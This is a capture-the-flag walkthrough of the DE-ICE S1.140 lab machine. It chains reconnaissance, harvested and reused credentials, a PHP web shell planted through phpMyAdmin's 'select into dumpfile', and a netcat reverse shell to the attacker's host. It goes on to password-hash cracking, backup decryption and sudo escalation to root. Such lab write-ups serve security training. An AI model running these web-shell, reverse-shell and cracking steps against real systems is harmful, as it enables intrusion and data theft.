Many thanks to Michael N. and Patrick B for putting this together, it really was fairly close to a real-world scenario.
To solve this challenge you will need the following:
1. Kali Linux (Other another suitable platform)
2. A copy of the darkc0de.lst wordlist, which can be downloaded from http://www.filecrop.com/darkc0de.lst.html
You have been employed by 'LazyAdmin Corp' to Pen Test their network. You have gained a footing in the organisation and now you're looking to extract some sensitive information. You've determined that this information is held on one of their servers, and now you're attempting to break into that server to extract it
Step 1 - Finding the Machine
When first fired up, the DE-ICE S1.140 machine aquires an IP address via DHCP. So the first step is finding it. My network automatically leased addresses in the 10.20.30.0/24 range out to clients, so I know it's on that network somewhere.
nmap -n -sn 10.20.30.0/24
It appears as though 10.20.30.3 looks like its the one I want (I already know what the other machines are)
Step 2 - Port and Service Scanning
Ok next step is to find out which ports are open on the machine, and hopefully which services are listening on those ports. Time to fire up the trusty nmap
nmap -sS -n -A -p- 10.20.30.3
Nmap tells me the following ports are open:
21/tcp - FTP - Anonymous logins allowed
22/tcp - SSH
80/tcp - http Webserver
443/tcp - https Webserver
993/tcp - POP3S
995/tcp - IMAPS
Ok, so it looks like there is FTP, SSH, a Webserver, and a mailserver running.
Step 3 - Exploring FTP
As anonymous FTP access is allowed, that will be the first port of call. A quick poke around shows us that there is a folder called 'incoming', but that only members of the ftp group have read access into it. A quick file upload shows that we can write into the folder, but read nothing from it. We'll come back to this later on.
Step 4 - Exploring the HTTP Webserver
Firing up a browser and pointing it to the IP address of the DE-ICE S1.140 machine gives us a HTML page which explains what we have to do.
Seeing a HTML page usually smacks of something else being hosted on the webserver, so lets fire up dirBuster and have a look.
dirBuster tells us that there is a forum being hosted on the webserver as well.
A quick look around the forum shows the following things
1. There are four users of the forum (admin, mbrown, rhedley, swillard)
2. The SWillard user used to be called SRaines
3. There is a large post entitled "Login Attacks" by MBrown that looks like it's a SSH log dump
Lets take a closer look at that SSH log file. It looks like someone was attempting to brute force their way onto one of the Lazy Admin Corp servers, trying various usernames and passwords, all of them failing. If we look closer though we can see that one of the login attempts succeeded.
The mbrown user successfully logged into this machine from the IP address of 10.0.0.23. If we search for all logins to this machine from this IP address we turn up another entry in the log, !DFiuoTkbxtdk0!, one that looks suspiciously like a password.
It looks like MBrown made the common mistake of typing their password into the username field, and then immediately attempted to login again with the correct details.
Before we go exploring anymore, lets have a look at the HTTPS service
Step 5 - Exploring the HTTPS Webserver
Time to fire up the trusty dirBuster again, this time against the HTTPS port. dirbuster tells us that there are another two services available, webmail and phpmyadmin.
Step 6 - Using MBrown's credentials
First place to try the MBrown's credentials is the forum. They work, allowing us to login. We don't appear to have the rights to do anything here (such as upload files), however we can get into our own profile, which gives us the following information:
1. The user's full name is Mark Brown
2. The user's email address is email@example.com
The second place to try MBrown's credentials is the webmail service. We log in here with the same password as the forum, but with the email address of firstname.lastname@example.org as our username.
Success! This lands us two emails. The first of which is an email from Sandy Willard, who has the email address of email@example.com, telling Mark Brown that he appears to be reusing credentials in multiple locations (Yep, she's right).
The second email gives us the root login credentials for a My-SQL server.
Step 7 - Logging into phpMyAdmin
We can now log into the phpMyAdmin site using the credentials in MBrown's email.
This contains the database for the webmails and forum. The following tables contain password hashes for each of the services
SELECT user_name,user_real_name,user_pw FROM forum.mlf2_userdata
SELECT username,password,name,maildir FROM mail.mailbox
We'll record these for cracking later.
Step 8 - Getting a shell on the box
Now we have phpMyAdmin access, we can get a shell on the box, but first we need to find a directory that we can write to, and also access from the website.
As the webserver is running the mylittleforum software, this is a good place to start our hunt. A quick google turns up a possible location in our very first link.
"...the write permission of the subdirectory templates_c (CHMOD 770, 775 or 777) might need to be changed in order that they are writable"
Can we access this directory from the webserver? Yes we can!
From the phpMyAdmin page, lets create a table to hold our shell
CREATE TABLE `test`.`phpshell` (`track1` VARCHAR( 1000 ) NOT NULL ) ENGINE = MYISAM;
Now lets create a quick shell to go in that table
insert into phpshell values
$cmd = ($_REQUEST['cmd']);
We now have to guess where the forum is actually hosted on the server. Chances are its in the default location of /var/www/ so lets try that first.
select * into dumpfile '/var/www/forum/templates_c/phpbackdoor.php' from phpshell
If everything has gone well, we should be able to call the phpshell with the following URL
Well the good news is that our php code has been uploaded, but the bad news is that the webserver is running as the low level apache user.
Time to get a real shell on the machine. First we create a named pipe to send data in and out of
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=mknod /var/www/forum/templates_c/backpipe p
Next we setup a netcat listener on our local Kali machine
nc -l -p 444
And finally we setup a reverse connection from our DE-ICE machine to our Kali machine
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=/bin/sh -c "/bin/bash 0</var/www/forum/templates_c/backpipe | nc 10.20.30.5 444 1>/var/www/forum/templates_c/backpipe"
Success! We now have a very limited shell on our DE-ICE machine. We can now spawn a slightly better shell which will allow us to migate to other users
python -c 'import pty;pty.spawn("/bin/bash")'
Step 9 - Cracking the hashes
We've now got a low-level privileged user on the machine, but we need access to a higher privilege one. Time to crack the hashes we obtained earlier from the forum and the webmail in the MySQL database.
First up is the webmail hashes. These look like just MD5 hashes, so lets put them in the following format and let John The Ripper have a crack at them with the darkc0de wordlist.
john --format=raw-md5 --wordlist=darkc0de.lst webmailhashes
Note - when you want john to display the results of cracking these hashes, you need to specify the --format=raw-md5 as well, otherwise they won't display
Success! We learn the following passwords:
- RHedley - tum-ti-tum
- SWillard - Austin-Willard
Time for the forum hashes. John the Ripper doesn't have a clue what format these are in, and Google doesn't help much either. The hashes must be stored in a strange format. Luckily, the forum software is open source, so we can find out how they generate the hashes.
A bit of searching around shows us that the password functions are stored in the 'functions.inc.php' file within the software.
Specifically we can reverse engineer the 'is_pw_correct' function to find out what happens when a user enters their password. The code of this function is below:
if(strlen($hash)==50) // salted sha1 hash with salt
$salted_hash = substr($hash,0,40);
$salt = substr($hash,40,10);
if(sha1($pw.$salt)==$salted_hash) return true;
else return false;
elseif(strlen($hash)==32) // md5 hash generated in an older version
if($hash == md5($pw)) return true;
else return false;
else return false;
Our password hashes are 50 characters in length, so they're Salted SHA1 hashes. The salt forms the last 10 characters of the hash, and the password hash itself is the first 40 characters.
Lets modify the create a file with the hashes in the following format:
John the Ripper still can't deal with these types of hashes, but the hashcat tool can
hashcat -m 110 forum_passwords darkc0de.lst
Success! We've obtained another password, although it's one we've already got, it shows that users are using the same password for multiple services.
- RHedley - tum-ti-tum
Time to try out these passwords directly on the shell we have on the DE-ICE machine
Step 10 - Obtaining the FTP Backup and Backup Script
Using the passwords we've cracked, lets try to escalate our privileges on the DE-ICE system. The SWillard password (Austin-Willard) doesn't appear to have been reused (well done Sandy) but the RHedley one (tum-ti-tum) does.
su - rhedley
Looking around the filesystem we find out that we can now get read access into the /home/ftp/incoming folder, as rhedley is a member of the ftpadmin group. In here we find a file that looks like a encrypted backup of the host. Lets move this to our Kali machine for later on, via the templates_c folder we were using earlier.
cp /home/ftp/incoming/backup_webhost_130111.tar.gz.enc /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc && chmod 666 /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc
We also find a file called "backup.sh" in the /opt/ directory. This is protected by extended ACLs so normal users cannot read it, but the members of the ftpadmin group have special read permissions. This can be verified with the following command:
This file contains the encryption type and password used for encrypting the FTP backup.
Using these two files we can unencrypt the backup file on our Kali machine
openssl aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -d -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
Now we have an unencrypted archive, it's just a matter of decompressing the file.
tar -zxvf backup_webhost_130111.tar.gz
Step 11 - Cracking the Shadow file
Looking around inside the backup, there are two files that jump out, the passwd file and the shadow file.
Time to put John the Ripper to use again to see if we can pull out any more interesting passwords
unshadow webhost/etc/passwd webhost/etc/shadow > unshadowed
john --wordlist=darkc0de.lst unshadowed --format=sha512crypt
Aha! We have the password for the sraines user of brillantissimo
But who is the sraines user? They don't exist on the DE-ICE system. Remember back when we first started though - someone mentioned in the forums that they got married and changed their last name from raines to willard....
Step 12 - Stealing the Secrets
First step is finding out what permissions SWillard has over the DE-ICE machine
It seems as though SWillard has the ability to run anything they like, so lets get some root privileges.
sudo su -
Now we're the root user, time to have a look around. The typical place to store information you want only root to have access to is in the /root/ directory, so lets have a look there first.
We find a file called secret.jpg...which looks very suspicious. If we open it up....?